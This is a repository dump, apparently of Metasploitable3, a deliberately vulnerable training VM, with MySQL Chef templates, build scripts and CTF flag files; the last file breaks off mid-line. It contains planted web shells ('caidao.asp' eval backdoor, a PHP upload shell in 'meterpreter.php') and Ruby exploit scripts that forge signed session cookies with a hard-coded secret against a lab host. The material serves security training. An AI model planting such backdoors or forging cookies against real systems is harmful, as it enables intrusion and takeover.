%>/*.pem r, 2 | /etc/<%= @mysql_name %>/conf.d/ r, 3 | /etc/<%= @mysql_name %>/conf.d/* r, 4 | /etc/<%= @mysql_name %>/my.cnf r, 5 | <%= @config.log_dir %>/ r, 6 | <%= @config.log_dir %>/* rw, 7 | <%= @config.data_dir %>/ r, 8 | <%= @config.data_dir %>/** rwk, 9 | <%= @config.run_dir %>/** rw, 10 | <%= @config.pid_file %> rw, 11 | <%= @config.socket_file %> rw, 12 | /tmp/<%= @mysql_name %>/ r, 13 | /tmp/<%= @mysql_name %>/my.sql r, 14 | <%= @config.tmp_dir %>/* rw, 15 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/apparmor/usr.sbin.mysqld-local.erb: -------------------------------------------------------------------------------- 1 | #include 2 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/apparmor/usr.sbin.mysqld.erb: -------------------------------------------------------------------------------- 1 | # vim:syntax=apparmor 2 | # Last Modified: Tue Jun 19 17:37:30 2007 3 | #include 4 | 5 | /usr/sbin/mysqld { 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | capability dac_override, 13 | capability sys_resource, 14 | capability setgid, 15 | capability setuid, 16 | 17 | network tcp, 18 | 19 | /etc/hosts.allow r, 20 | /etc/hosts.deny r, 21 | 22 | /etc/mysql/*.pem r, 23 | /etc/mysql/conf.d/ r, 24 | /etc/mysql/conf.d/* r, 25 | /etc/mysql/*.cnf r, 26 | /usr/lib/mysql/plugin/ r, 27 | /usr/lib/mysql/plugin/*.so* mr, 28 | /usr/sbin/mysqld mr, 29 | /usr/share/mysql/** r, 30 | /var/log/mysql.log rw, 31 | /var/log/mysql.err rw, 32 | /var/lib/mysql/ r, 33 | /var/lib/mysql/** rwk, 34 | /var/log/mysql/ r, 35 | /var/log/mysql/* rw, 36 | /var/run/mysqld/mysqld.pid rw, 37 | /var/run/mysqld/mysqld.sock w, 38 | /var/run/mysqld/mysqld.sock.lock rw, 39 | /run/mysqld/mysqld.pid rw, 40 | /run/mysqld/mysqld.sock w, 41 | /run/mysqld/mysqld.sock.lock rw, 42 | 43 | /sys/devices/system/cpu/ r, 44 | 45 | # Site-specific additions and overrides. See local/README for details. 46 | #include 47 | } 48 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/smf/svc.method.mysqld.erb: -------------------------------------------------------------------------------- 1 | #!/sbin/sh 2 | # 3 | # Generated by Chef 4 | # 5 | 6 | . /lib/svc/share/smf_include.sh 7 | 8 | ulimit -n 10240 9 | 10 | case "$1" in 11 | start) 12 | <%= @mysqld_bin %> \ 13 | --defaults-file=<%= @defaults_file %> \ 14 | --basedir=<%= @base_dir %> \ 15 | --datadir=<%= @data_dir %> \ 16 | --pid-file=<%= @pid_file %> \ 17 | --log-error=<%= @error_log %> & 18 | ;; 19 | stop) 20 | [ -f <%= @pid_file %> ] && kill `/usr/bin/head -1 <%= @pid_file %>` 21 | ;; 22 | *) 23 | echo "Usage: $0 {start|stop}" >&2 24 | exit 1 25 | ;; 26 | esac 27 | 28 | exit $SMF_EXIT_OK 29 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/systemd/mysqld-wait-ready.erb: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | daemon_pid="$1" 4 | 5 | # Wait for the server to come up or for the mysqld process to disappear 6 | ret=0 7 | while /bin/true; do 8 | RESPONSE=`/usr/bin/mysqladmin --no-defaults --socket="<%= @socket_file %>" --user=UNKNOWN_MYSQL_USER ping 2>&1` 9 | mret=$? 10 | if [ $mret -eq 0 ]; then 11 | break 12 | fi 13 | # exit codes 1, 11 (EXIT_CANNOT_CONNECT_TO_SERVICE) are expected, 14 | # anything else suggests a configuration error 15 | if [ $mret -ne 1 -a $mret -ne 11 ]; then 16 | ret=1 17 | break 18 | fi 19 | # "Access denied" also means the server is alive 20 | echo "$RESPONSE" | grep -q "Access denied for user" && break 21 | 22 | # Check process still exists 23 | if ! /bin/kill -0 $daemon_pid 2>/dev/null; then 24 | ret=1 25 | break 26 | fi 27 | sleep 1 28 | done 29 | 30 | exit $ret 31 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/systemd/mysqld.service.erb: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=mysql_service[mysql-<%= @config.instance %>] 3 | After=syslog.target 4 | After=network.target 5 | 6 | [Service] 7 | Type=simple 8 | User=<%= @config.run_user %> 9 | Group=<%= @config.run_group %> 10 | ExecStart=<%= @mysqld_bin %> --defaults-file=<%= @etc_dir %>/my.cnf --basedir=<%= @base_dir %> 11 | ExecStartPost=/usr/libexec/mysql-<%= @config.instance %>-wait-ready $MAINPID 12 | TimeoutSec=300 13 | PrivateTmp=true 14 | 15 | [Install] 16 | WantedBy=multi-user.target 17 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/tmpfiles.d.conf.erb: -------------------------------------------------------------------------------- 1 | d <%= @run_dir %> 0755 <%= @run_user %> <%= @run_group %> - 2 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/upstart/mysqld-wait-ready.erb: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Wait for the server to come up 4 | ret=0 5 | while /bin/true; do 6 | RESPONSE=`/usr/bin/mysqladmin --no-defaults --socket="<%= @socket_file %>" --user=UNKNOWN_MYSQL_USER ping 2>&1` 7 | mret=$? 8 | if [ $mret -eq 0 ]; then 9 | break 10 | fi 11 | # exit codes 1, 11 (EXIT_CANNOT_CONNECT_TO_SERVICE) are expected, 12 | # anything else suggests a configuration error 13 | if [ $mret -ne 1 -a $mret -ne 11 ]; then 14 | ret=1 15 | break 16 | fi 17 | # "Access denied" also means the server is alive 18 | echo "$RESPONSE" | grep -q "Access denied for user" && break 19 | sleep 1 20 | done 21 | 22 | exit $ret 23 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/upstart/mysqld.erb: -------------------------------------------------------------------------------- 1 | # <%= @mysql_name %> Service 2 | 3 | description "MySQL service <%= @mysql_name %>" 4 | author "chef-client" 5 | 6 | start on runlevel [2345] 7 | stop on starting rc RUNLEVEL=[016] 8 | 9 | respawn 10 | respawn limit 2 5 11 | 12 | env HOME=/etc/<%= @mysql_name %> 13 | umask 007 14 | 15 | kill timeout 300 16 | 17 | pre-start script 18 | [ -d /run/<%= @mysql_name %> ] || install -m 755 -o <%= @run_user %> -g <%= @run_group %> -d /run/<%= @mysql_name %> 19 | [ -d <%= @socket_dir %> ] || install -m 755 -o <%= @run_user %> -g <%= @run_group %> -d <%= @socket_dir %> 20 | end script 21 | 22 | exec /usr/sbin/mysqld --defaults-file=<%= @defaults_file %> 23 | 24 | post-start script 25 | /usr/sbin/<%= @mysql_name %>-wait-ready 26 | end script 27 | -------------------------------------------------------------------------------- /cortex.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | info: 3 | title: Metasploitable3 4 | description: Metasploitable3 is a VM that is built from the ground up with a large 5 | amount of security vulnerabilities. 6 | x-cortex-git: 7 | github: 8 | alias: r7org 9 | repository: rapid7/metasploitable3 10 | x-cortex-tag: metasploitable3 11 | x-cortex-type: service 12 | x-cortex-domain-parents: 13 | - tag: metasploit 14 | x-cortex-groups: 15 | - exposure:external-ship 16 | openapi: 3.0.1 17 | servers: 18 | - url: "/" 19 | -------------------------------------------------------------------------------- /iso/README.md: -------------------------------------------------------------------------------- 1 | ### What Is This Directory For? 2 | 3 | You should download your Windows Server ISO images from TechNet/MSDN and place them in this folder. We need to do this because MSDN / TechNet are protected by Microsoft (Live) ID, which does not support HTTP basic authentication or the OAuth2 username / password flow. 4 | 5 | For example, you might want to start with one of the following: 6 | 7 | * Windows Server 2008 R2 + SP1: 8 | * File Name: en_windows_server_2008_r2_with_sp1_x64_dvd_617601.iso 9 | * SHA1 Hash: D3FD7BF85EE1D5BDD72DE5B2C69A7B470733CD0A 10 | * Direct Download: http://msdn.microsoft.com/subscriptions/json/GetDownloadRequest?brand=MSDN&locale=en-us&fileId=44782&activexDisabled=true&akamaiDL=false 11 | * Windows Server 2008 R2 + SP1 (Volume License): 12 | * File Name: en_windows_server_2008_r2_with_sp1_vl_build_x64_dvd_617403.iso 13 | * SHA1 Hash: 7E7E9425041B3328CCF723A0855C2BC4F462EC57 14 | * Direct Download: http://msdn.microsoft.com/subscriptions/json/GetDownloadRequest?brand=MSDN&locale=en-us&fileId=44783&activexDisabled=true&akamaiDL=false 15 | * Windows Server 2012: 16 | * File Name: en_windows_server_2012_x64_dvd_915478.iso 17 | * SHA1 Hash: D09E752B1EE480BC7E93DFA7D5C3A9B8AAC477BA 18 | * Direct Download: http://msdn.microsoft.com/subscriptions/json/GetDownloadRequest?brand=MSDN&locale=en-us&fileId=50539&activexDisabled=true&akamaiDL=false 19 | * Windows Server 2012 (Volume License): 20 | * File Name: en_windows_server_2012_vl_x64_dvd_917758.iso 21 | * SHA1 Hash: 063BC26ED45C50D3745CCAD52DD7B3F3CE13F36D 22 | * Direct Download: http://msdn.microsoft.com/subscriptions/json/GetDownloadRequest?brand=MSDN&locale=en-us&fileId=50573&activexDisabled=true&akamaiDL=false -------------------------------------------------------------------------------- /packer/scripts/virtio-win-drivers.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # URI for downloading the latest WHQL'd Virtio drivers 4 | virtio_release="virtio-win-0.1.117_amd64" 5 | virtio_release_folder="virtio-win-0.1.117-1" 6 | virtio_uri="https://fedorapeople.org/groups/virt/virtio-win/direct-downloads/archive-virtio/${virtio_release_folder}/${virtio_release}.vfd" 7 | 8 | # le flag 9 | have_tools=true 10 | 11 | # Tools messages 12 | need_wget () { 13 | echo "Could not find wget, which is needed to download the virtio disk." 14 | echo "To install -" 15 | echo "" 16 | echo "Fedora: sudo dnf install wget" 17 | echo "Debian/Ubuntu: sudo apt install wget" 18 | } 19 | 20 | need_7z () { 21 | echo "Could not find 7z, which is required for extracting the virtio driver disk." 22 | echo "To install -" 23 | echo "" 24 | echo "Fedora: sudo dnf install p7zip p7zip-plugins" 25 | echo "Debian/Ubuntu: sudo apt install p7zip-full" 26 | } 27 | 28 | # Check for needed tools 29 | if [ ! -x /usr/bin/wget ]; then 30 | need_wget 31 | have_tools=false 32 | fi 33 | 34 | if [ ! -x /usr/bin/7z ]; then 35 | need_7z 36 | have_tools=false 37 | fi 38 | 39 | if [ "$have_tools" = true ]; then 40 | if [ -f ".${virtio_release}.vfd" ]; then 41 | echo ".${virtio_release}.vfd already exists, skipping download." 42 | else 43 | echo "Downloading and extracting virtio ${virtio_release} drivers." 44 | wget -c "${virtio_uri}" -O ".${virtio_release}.vfd" && 7z x -oresources/drivers/virtio/"${virtio_release}" ".${virtio_release}.vfd" amd64/Win2008R2 45 | fi 46 | fi 47 | -------------------------------------------------------------------------------- /resources/apache_struts/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 24 | 25 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /resources/apache_struts/struts2-rest-showcase.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/apache_struts/struts2-rest-showcase.war -------------------------------------------------------------------------------- /resources/backdoors/caidao.asp: -------------------------------------------------------------------------------- 1 | <%eval request("password")%> -------------------------------------------------------------------------------- /resources/backdoors/meterpreter.php: -------------------------------------------------------------------------------- 1 | /*

'.php_uname().'
'; 3 | echo '
'; 4 | echo '
'; 5 | if( $_POST['_upl'] == "Upload" ) { 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'uplod d0n3 in SAME file // Th3 MMA \\

'; } 7 | else { echo 'Upload GAGAL !!!

'; 8 | } } 9 | ?> 10 | -------------------------------------------------------------------------------- /resources/certs/COMODORSAAddTrustCA.crt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/COMODORSAAddTrustCA.crt -------------------------------------------------------------------------------- /resources/certs/COMODORSAExtendedValidationSecureServerCA.crt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/COMODORSAExtendedValidationSecureServerCA.crt -------------------------------------------------------------------------------- /resources/certs/addtrust_external_ca.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/addtrust_external_ca.cer -------------------------------------------------------------------------------- /resources/certs/baltimore_ca.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/baltimore_ca.cer -------------------------------------------------------------------------------- /resources/certs/digicert.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/digicert.cer -------------------------------------------------------------------------------- /resources/certs/equifax.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/equifax.cer -------------------------------------------------------------------------------- /resources/certs/gdig2.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIE0DCCA7igAwIBAgIBBzANBgkqhkiG9w0BAQsFADCBgzELMAkGA1UEBhMCVVMx 3 | EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoT 4 | EUdvRGFkZHkuY29tLCBJbmMuMTEwLwYDVQQDEyhHbyBEYWRkeSBSb290IENlcnRp 5 | ZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTExMDUwMzA3MDAwMFoXDTMxMDUwMzA3 6 | MDAwMFowgbQxCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6b25hMRMwEQYDVQQH 7 | EwpTY290dHNkYWxlMRowGAYDVQQKExFHb0RhZGR5LmNvbSwgSW5jLjEtMCsGA1UE 8 | CxMkaHR0cDovL2NlcnRzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkvMTMwMQYDVQQD 9 | EypHbyBEYWRkeSBTZWN1cmUgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IC0gRzIwggEi 10 | MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC54MsQ1K92vdSTYuswZLiBCGzD 11 | BNliF44v/z5lz4/OYuY8UhzaFkVLVat4a2ODYpDOD2lsmcgaFItMzEUz6ojcnqOv 12 | K/6AYZ15V8TPLvQ/MDxdR/yaFrzDN5ZBUY4RS1T4KL7QjL7wMDge87Am+GZHY23e 13 | cSZHjzhHU9FGHbTj3ADqRay9vHHZqm8A29vNMDp5T19MR/gd71vCxJ1gO7GyQ5HY 14 | pDNO6rPWJ0+tJYqlxvTV0KaudAVkV4i1RFXULSo6Pvi4vekyCgKUZMQWOlDxSq7n 15 | eTOvDCAHf+jfBDnCaQJsY1L6d8EbyHSHyLmTGFBUNUtpTrw700kuH9zB0lL7AgMB 16 | AAGjggEaMIIBFjAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAdBgNV 17 | HQ4EFgQUQMK9J47MNIMwojPX+2yz8LQsgM4wHwYDVR0jBBgwFoAUOpqFBxBnKLbv 18 | 9r0FQW4gwZTaD94wNAYIKwYBBQUHAQEEKDAmMCQGCCsGAQUFBzABhhhodHRwOi8v 19 | b2NzcC5nb2RhZGR5LmNvbS8wNQYDVR0fBC4wLDAqoCigJoYkaHR0cDovL2NybC5n 20 | b2RhZGR5LmNvbS9nZHJvb3QtZzIuY3JsMEYGA1UdIAQ/MD0wOwYEVR0gADAzMDEG 21 | CCsGAQUFBwIBFiVodHRwczovL2NlcnRzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkv 22 | MA0GCSqGSIb3DQEBCwUAA4IBAQAIfmyTEMg4uJapkEv/oV9PBO9sPpyIBslQj6Zz 23 | 91cxG7685C/b+LrTW+C05+Z5Yg4MotdqY3MxtfWoSKQ7CC2iXZDXtHwlTxFWMMS2 24 | RJ17LJ3lXubvDGGqv+QqG+6EnriDfcFDzkSnE3ANkR/0yBOtg2DZ2HKocyQetawi 25 | DsoXiWJYRBuriSUBAA/NxBti21G00w9RKpv0vHP8ds42pM3Z2Czqrpv1KrKQ0U11 26 | GIo/ikGQI31bS/6kA1ibRrLDYGCD+H1QQc7CoZDDu+8CL9IVVO5EFdkKrqeKM+2x 27 | LXY2JtwE65/3YR8V3Idv7kaWKK2hJn0KCacuBKONvPi8BDAB 28 | -----END CERTIFICATE----- -------------------------------------------------------------------------------- /resources/certs/globalsign.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/globalsign.cer -------------------------------------------------------------------------------- /resources/certs/gte_cybertrust.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/gte_cybertrust.cer -------------------------------------------------------------------------------- /resources/certs/microsoft_root_2011.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/microsoft_root_2011.cer -------------------------------------------------------------------------------- /resources/certs/oracle-cert.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/oracle-cert.cer -------------------------------------------------------------------------------- /resources/certs/thawte_primary_root.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/thawte_primary_root.cer -------------------------------------------------------------------------------- /resources/certs/utn-userfirst.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/utn-userfirst.cer -------------------------------------------------------------------------------- /resources/download-windows-files.ps1: -------------------------------------------------------------------------------- 1 | $Logfile = "C:\Windows\Temp\wmf-install.log" 2 | function LogWrite { 3 | Param ([string]$logstring) 4 | $now = Get-Date -format s 5 | Add-Content $Logfile -value "$now $logstring" 6 | Write-Host $logstring 7 | } 8 | 9 | LogWrite "Downloading dotNet 4.5.2" 10 | try { 11 | (New-Object System.Net.WebClient).DownloadFile('https://download.microsoft.com/download/E/2/1/E21644B5-2DF2-47C2-91BD-63C560427900/NDP452-KB2901907-x86-x64-AllOS-ENU.exe', 'windows_pre_downloads/dotnet.exe') 12 | } catch { 13 | LogWrite $_.Exception | Format-List -force 14 | LogWrite "Failed to download file." 15 | } 16 | 17 | LogWrite "Downloading Windows Management Framework 5.1" 18 | try { 19 | (New-Object System.Net.WebClient).DownloadFile('https://download.microsoft.com/download/6/F/5/6F5FF66C-6775-42B0-86C4-47D41F2DA187/Win7AndW2K8R2-KB3191566-x64.zip', 'windows_pre_downloads/wmf.zip') 20 | } catch { 21 | LogWrite $_.Exception | Format-List -force 22 | LogWrite "Failed to download file." 23 | } 24 | -------------------------------------------------------------------------------- /resources/download-windows-files.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -e 2 | curl -L --output windows_pre_downloads/dotnet.exe https://download.microsoft.com/download/E/2/1/E21644B5-2DF2-47C2-91BD-63C560427900/NDP452-KB2901907-x86-x64-AllOS-ENU.exe 3 | curl -L --output windows_pre_downloads/wmf.zip https://download.microsoft.com/download/6/F/5/6F5FF66C-6775-42B0-86C4-47D41F2DA187/Win7AndW2K8R2-KB3191566-x64.zip 4 | -------------------------------------------------------------------------------- /resources/flags/ace_of_hearts.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/ace_of_hearts.jpg -------------------------------------------------------------------------------- /resources/flags/four_of_clubs.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/four_of_clubs.wav -------------------------------------------------------------------------------- /resources/flags/hahaha.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/hahaha.jpg -------------------------------------------------------------------------------- /resources/flags/jack_of_clubs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/jack_of_clubs.png -------------------------------------------------------------------------------- /resources/flags/jack_of_hearts.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/jack_of_hearts.docx -------------------------------------------------------------------------------- /resources/flags/kingofclubs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/kingofclubs.exe -------------------------------------------------------------------------------- /resources/flags/linux_flags/10_of_clubs/10 of clubs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/10_of_clubs/10 of clubs.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/10_of_clubs/10_of_clubs.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/10_of_clubs/10_of_clubs.wav -------------------------------------------------------------------------------- /resources/flags/linux_flags/10_of_clubs/extracted_flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/10_of_clubs/extracted_flag.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/10_of_clubs/get_flag.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | #!/usr/bin/env ruby 3 | 4 | require 'zlib' 5 | 6 | def load_wav(fname) 7 | File.read(fname) 8 | end 9 | 10 | def find_data_chunk_offset(wav) 11 | wav.index('data') + 1 12 | end 13 | 14 | def get_data_chunk_size(wav) 15 | data_chunk_offset = find_data_chunk_offset(wav) 16 | wav[data_chunk_offset, 4].unpack('N').first 17 | end 18 | 19 | def extract_data_chunk(wav) 20 | chunk_offset = find_data_chunk_offset(wav) 21 | chunk_size = get_data_chunk_size(wav) 22 | 23 | wav[chunk_offset + 4 + 3, chunk_size] 24 | end 25 | 26 | wav_fname = ARGV.shift 27 | output = ARGV.shift 28 | 29 | wav = load_wav(wav_fname) 30 | data_chunk = extract_data_chunk(wav) 31 | data_chunk = Zlib::Inflate.inflate(data_chunk) 32 | 33 | File.open(output, 'wb') do |f| 34 | f.write(data_chunk) 35 | end 36 | 37 | puts "#{output} written" 38 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_diamonds/five_of_diamonds: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/5_of_diamonds/five_of_diamonds -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_diamonds/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/5_of_diamonds/source.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_hearts/5_of_hearts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/5_of_hearts/5_of_hearts.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_hearts/extract_metadata.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'chunky_png' 4 | require 'base64' 5 | 6 | img_fname = ARGV.shift 7 | 8 | if img_fname.nil? || img_fname.empty? 9 | puts "[*] Please provide a PNG file" 10 | exit 11 | end 12 | 13 | puts "[*] Extracting 5 of Hearts from #{img_fname}..." 14 | img = ChunkyPNG::Image.from_file(img_fname) 15 | five_of_hearts = Base64::strict_decode64(img.metadata['5_of_hearts']) 16 | File.open('real_5_of_hearts.png', 'wb') { |f| f.write(five_of_hearts) } 17 | 18 | puts "[*] Done." 19 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_hearts/fake.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/5_of_hearts/fake.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_hearts/inject_metadata.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'chunky_png' 4 | require 'base64' 5 | 6 | FAKEPNG = 'fake.png' 7 | SOURCEPNG = 'source.png' 8 | OUTPNG = '5_of_hearts.png' 9 | 10 | puts "[*] Injecting 5 of Hearts data into #{FAKEPNG}..." 11 | source = File.read(SOURCEPNG) 12 | b64 = Base64.strict_encode64(source) 13 | img = ChunkyPNG::Image.from_file(FAKEPNG) 14 | img.metadata['5_of_hearts'] = b64 15 | img.save(OUTPNG) 16 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_hearts/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/5_of_hearts/source.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/6_of_clubs/check_sinatra_vuln.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | 3 | # 4 | # This will check our vulnerable app to see if it's vulnerable or not. 5 | # It does so by predicting the hash in the cookie. 6 | # 7 | 8 | require 'openssl' 9 | require 'cgi' 10 | require 'net/http' 11 | require 'base64' 12 | 13 | SECRET = "a7aebc287bba0ee4e64f947415a94e5f" 14 | 15 | cli = Net::HTTP.new('172.28.128.3', 8181) 16 | req = Net::HTTP::Get.new('/') 17 | res = cli.request(req) 18 | cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || '' 19 | data, hash = cookie.split('--') 20 | obj = Marshal.load(Base64.decode64(CGI.unescape(data))) 21 | puts "[*] Found data: #{obj}" 22 | puts "[*] Found hash: #{hash}" 23 | puts "[*] Attempting to recreate the same hash with secret: #{SECRET}" 24 | expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data)) 25 | puts "[*] Predicted hash: #{expected_hash}" 26 | 27 | if expected_hash == hash 28 | puts "[*] Yay! we can predict the hash. The server is vulnerable." 29 | end 30 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/6_of_clubs/get_flag.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # 4 | # This PoC will inject Ruby code in our vulnerable app. 5 | # It will run the system command "id", and save the output in /tmp/your_id.txt 6 | # 7 | 8 | require 'openssl' 9 | require 'cgi' 10 | require 'net/http' 11 | require 'base64' 12 | require 'digest' 13 | 14 | SECRET = "a7aebc287bba0ee4e64f947415a94e5f" 15 | 16 | http = Net::HTTP.new('172.28.128.3', 8181) 17 | req = Net::HTTP::Get.new('/') 18 | res = http.request(req) 19 | cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || '' 20 | data, hash = cookie.split('--') 21 | obj = Marshal.load(Base64.decode64(CGI.unescape(data))) 22 | sid = obj['session_id'] 23 | puts "[*] Obtained session ID: #{sid}" 24 | 25 | puts "[*] Using stolen SECRET: #{SECRET}" 26 | puts "[*] Modifying _metasploitable cookie to 'six of clubs'" 27 | data = { 'session_id' => sid, '_metasploitable' => "six of clubs" } 28 | dump = [ Marshal.dump(data) ].pack('m') 29 | hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump) 30 | cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}" 31 | 32 | req = Net::HTTP::Get.new('/flag') 33 | req['Cookie'] = cookie 34 | res = http.request(req) 35 | 36 | File.open('6_of_clubs.png', 'wb') { |f| f.write(res.body) } 37 | md5 = Digest::MD5.hexdigest(res.body) 38 | puts "[*] 6_of_clubs.png downloaded." 39 | puts "[*] 6 of Clubs MD5: #{md5}" 40 | 41 | =begin 42 | $ ruby get_flag.rb 43 | [*] Obtained session ID: e3d1958384f27cc5f16424f060c480ff28048ebd4bff3f338d00f045ff308752 44 | [*] Using stolen SECRET: a7aebc287bba0ee4e64f947415a94e5f 45 | [*] Modifying _metasploitable cookie to 'six of clubs' 46 | [*] 6_of_clubs.png downloaded. 47 | [*] 6 of Clubs MD5: d9247a49d132a4f92dcc813f63eb1c8b 48 | =end 49 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/6_of_clubs/poc.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # 4 | # This PoC will inject Ruby code in our vulnerable app. 5 | # It will run the system command "id", and save the output in /tmp/your_id.txt 6 | # 7 | 8 | require 'openssl' 9 | require 'cgi' 10 | require 'net/http' 11 | 12 | SECRET = 